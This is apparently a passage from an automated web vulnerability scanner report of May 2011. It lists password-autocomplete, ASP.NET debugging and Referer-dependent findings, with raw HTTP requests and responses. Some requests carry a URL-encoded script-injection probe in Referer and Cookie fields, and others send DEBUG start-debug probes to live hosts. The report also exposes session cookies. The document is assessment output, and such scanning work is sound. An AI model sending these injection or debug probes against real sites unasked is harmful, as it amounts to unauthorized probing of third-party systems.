cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">            <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">                                <fieldset>
...[SNIP]...
<br />                        <input type="password" name="PASSWORD" tabindex="2" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

14.18. http://www.911enable.com/login/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /login/index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/index.php HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/business.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.4.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:54 GMT
Content-Length: 18966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<p style="width:445px;">
<form method="post" action="https://www.911enable.com/911form/login_process.php" enctype="multipart/form-data">
<table id="requestFormTable">
...[SNIP]...
<td><input type="password" name="pass" class="formText" style="width:130px;" /></td>
...[SNIP]...

14.19. https://www.nationalnanpa.com/nas/security/authUser.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/authUser.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nas/security/authUser.do?function=verifySignIn HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: http://www.nationalnanpa.com/number_resource_info/area_code_maps.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.2.10.1305158784

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7557


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</script>


<form name="loginForm" method="post" action="/nas/security/logon.do?function=signon" onsubmit="return validate();"><input type="hidden" name="org.apache.struts.taglib.html.TOKEN" value="fc55bb28097906d9b23bc17edb76d94d">
...[SNIP]...
<td width="65%" valign="middle" align="left">
    <input type="password" name="password" maxlength="30" size="20" value="">
</td>
...[SNIP]...

14.20. https://www.nationalnanpa.com/nas/security/logon.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/logon.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nas/security/logon.do;nanpaid=PbtxNLkWc1vbGTPPjJJ6vh7sQPWwtrp8yq10ytK0spRy8vN5RTQB!-242160596?function=signon HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:16:47 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7600


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<hr>

<form name="loginForm" method="post" action="/nas/security/logon.do?function=signon" onsubmit="return validate();">
<!-- we don't want it as struts cause we don't have a form associated yet. -->
...[SNIP]...
<td width="65%" valign="middle" align="left">
    <input type="password" name="password" maxlength="30" size="20" value="">
</td>
...[SNIP]...

14.21. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.22. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.23. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.24. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.25. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.26. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.27. http://www.secviz.org/node/89  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...
<div class="content">
<form action="/content/the-davix-live-cd?destination=node%2F89" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15. ASP.NET debugging enabled  previous  next
There are 4 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



15.1. http://gvnwlnp.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://gvnwlnp.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: gvnwlnp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 00:44:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="gvnwlnp.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.2. https://gvnwlnp.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://gvnwlnp.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: gvnwlnp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 00:50:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="gvnwlnp.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.3. http://www.etalkup.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.etalkup.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.etalkup.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 01:06:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.4. http://www.redskye911.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.redskye911.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.redskye911.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 01:06:40 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.redskye911.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response  previous  next
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



16.1. http://twitter.com/statuses/user_timeline/secviz.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/secviz.json

Request 1

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161343-28574-3094
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04405
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 48c6b00eb172eca08292fefc3f9a44aa803a0bea
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161343071359; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr8kpyX5k%2BwrH7KWx%2F5%2BVN6GIeAi2OckkTU%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMagreEvAToHaWQiJTFlNzc0MGNjZDE5YWRh%250ANmViZDk3ZWZmMTgxMzUwYjRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--9e2ecb2bd74b01132ec8ea6647ea1b3428d0ca0f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

